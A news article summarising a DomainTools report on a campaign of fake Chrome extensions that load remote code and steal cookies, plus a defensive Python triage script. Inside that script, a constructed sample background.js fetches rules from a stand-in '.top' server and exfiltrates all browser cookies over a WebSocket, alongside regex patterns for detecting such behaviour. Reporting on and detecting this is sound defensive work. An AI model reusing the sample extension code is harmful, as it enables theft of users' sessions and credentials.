Over 100 malicious Chrome extensions detected: disguised as AI tools, VPNs, and crypto utilities


Over the course of more than a year, an unknown cybercriminal has spawned over 100 fake, malicious Chrome extensions with dual functionality, capable of tracking users and stealing their access tokens. The hacker bypasses Google’s defenses by injecting malicious scripts remotely, after the extension is installed.

A new report by DomainTools details a “massive, ongoing campaign of malicious Chrome extensions” that lure users to use “free” VPNs, AI tools, crypto or SEO utilities, and other Chrome extensions.

At the time of writing, many of the disclosed malicious extensions are still available on the Chrome Web Store (CWS).


“The extensions typically have a dual functionality, in which they generally appear to function as intended, but also connect to malicious servers to send user data, receive commands, and execute arbitrary code,” the report explains.

Some examples of fraudulent extensions include Deepseek AI, DeBank, Manus AI, Eart VPN, Eelephant, Forti VPN, and SiteStats.

In this campaign, the threat actor first creates a lure website that masquerades as a legitimate service, productivity tool, or assistant. The lure website directs users to Google’s CWS to install the corresponding malicious extension.

The hacker has also established an ecosystem of API servers that control the extensions, send commands, and listen to user data. All of the few dozen detected servers used [.]top as their top-level domain.


“Analysis revealed these extensions can execute arbitrary code from attacker-controlled servers on all visited websites, enabling credential theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Some extensions were also observed attempting to steal all browser cookies, which may lead to account compromises,” the DomainTools researchers warn.

Separate research by Cybernews has previously revealed that Chrome extensions often require too many dangerous permissions. Over a month ago, 58 other malicious Chrome extensions were also discovered to be preying on users.

How does the hacker bypass Google’s defenses?


Chrome is transitioning to a new version of the extension platform, known as Manifest Version 3 (MV3). It is supposed to bring more security and higher efficiency.

“No more remotely hosted code,” Google says on the landing page.

However, the discovered malicious extensions depend on running remote code: they fetch rules from a hacker-controlled backend and execute them on every site visited by a user.

“The extensions analyzed appear to have working or partially working functionality and are commonly configured with excessive permissions to interact with every site the browser visits and retrieve and execute arbitrary code from a network of other actor-controlled domains,” the researchers explain.

Despite differences in names and masquerades, each extension had a similar code structure and hosting infrastructure.

One analyzed extension had a “background.js” script that fetches and applies “declarativeNetRequest” rules from the backend.

“This allows the author to modify network requests (block, redirect, modify headers) after the extension is installed, bypassing Chrome Web Store review for those changes. This could be used for malicious redirects, ad injection, or tracking,” the researchers said.


The background script was observed sending encrypted system data, such as platform, language, memory, cores, timezone, IP, country code, and receiving the rules and “potentially executable code.”

The extension’s content script, which is injected into all visited pages, was also observed executing arbitrary code, which was fetched from the attacker-controlled server.


A Forti VPN extension actually provided users with “some of the advertised purpose” by using a hardcoded API key to a third-party service. However, its main purpose was to connect to a malicious backend and listen for commands over a WebSocket held open with the keep-alive mechanism.

When commanded, the extension would exfiltrate all browser cookies, compress and encode them in Base64, and send them to the hacker.

“It can be commanded to establish a separate WebSocket connection to act as a network proxy, potentially routing the user's traffic through malicious servers,” the DomainTools researchers noted.

The malicious extensions have backend API servers hardcoded, typically in the background.js or a similar file. To authenticate with the hacker’s server, the extensions use a standard JWT method and securely sign the data using SHA-256.
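As an added example (not code from the DomainTools report or from any of the extensions it names), the following Python triage script checks an unpacked extension’s manifest and background script for the traits described above: site-wide host access, declarativeNetRequest with remotely fetched rules, a hardcoded .top backend, a WebSocket command channel, bulk cookie access, and dynamic code execution. The manifest and script it scans are constructed samples, and the scoring rule is the author’s own heuristic.

```python
import json
import re

# Constructed sample (not any real extension's code) modelled on the report's traits: broad
# host access, remote declarativeNetRequest rules from a hardcoded .top backend, a WebSocket.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "permissions": ["declarativeNetRequest", "cookies", "storage"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "background.js"},
})
SAMPLE_BACKGROUND_JS = """
const API = "https://example-backend.top/api";
fetch(API + "/rules").then(r => r.json()).then(rules =>
  chrome.declarativeNetRequest.updateDynamicRules({addRules: rules}));
const ws = new WebSocket("wss://example-backend.top/ws");
ws.onmessage = e => chrome.cookies.getAll({}, c => ws.send(btoa(JSON.stringify(c))));
"""

# Script-level behaviours the report calls out; a regex hit is one finding.
SCRIPT_CHECKS = {
    "hardcoded .top backend": r"(?:https?|wss?)://[\w.-]+\.top\b",
    "remote rules applied via declarativeNetRequest": r"declarativeNetRequest\.updateDynamicRules",
    "WebSocket command channel": r"new\s+WebSocket\(",
    "bulk cookie access": r"chrome\.cookies\.getAll",
    "dynamic code execution": r"\beval\(|new\s+Function\(",
}

def triage(manifest_json, script_text):
    """Return sorted risk findings for one unpacked extension (manifest + background script)."""
    manifest = json.loads(manifest_json)
    findings = set()
    hosts = set(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        hosts.update(cs.get("matches", []))
    if "<all_urls>" in hosts or any(h.startswith("*://*/") for h in hosts):
        findings.add("access to every site the browser visits")
    findings.update(f"permission: {p}" for p in ("declarativeNetRequest", "cookies")
                    if p in manifest.get("permissions", []))
    for label, pattern in SCRIPT_CHECKS.items():
        if re.search(pattern, script_text):
            findings.add(label)
    return sorted(findings)

def risk_score(findings):
    """Crude heuristic: site-wide access combined with a remote channel is the red flag."""
    remote = any(f in findings for f in ("hardcoded .top backend", "WebSocket command channel"))
    broad = "access to every site the browser visits" in findings
    return len(findings) + (5 if remote and broad else 0)
```

Run `triage(SAMPLE_MANIFEST, SAMPLE_BACKGROUND_JS)` on the sample to see all seven findings; pointing it at a real unpacked extension’s manifest.json and service worker file is the intended use.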

The malicious websites share many registration patterns, such as registrar (NameSilo), name server and IP ISP (Cloudflare), and SSL issuer (WE1). The threat actor commonly uses a set of Facebook Tracker IDs, listed in the report with other indicators of compromise.

The researchers acknowledged that the Chrome Web Store has removed several of the actor’s malicious extensions after they were identified as malware.

“However, the actor's persistence and the time lag in detection and removal pose a threat to users seeking productivity tools and browser enhancements,” they warn.

They recommend users stick to verified and reputable developers, carefully review requested permissions before installing extensions, and be especially wary of lookalike extensions. Antivirus software might help to detect the threat earlier.
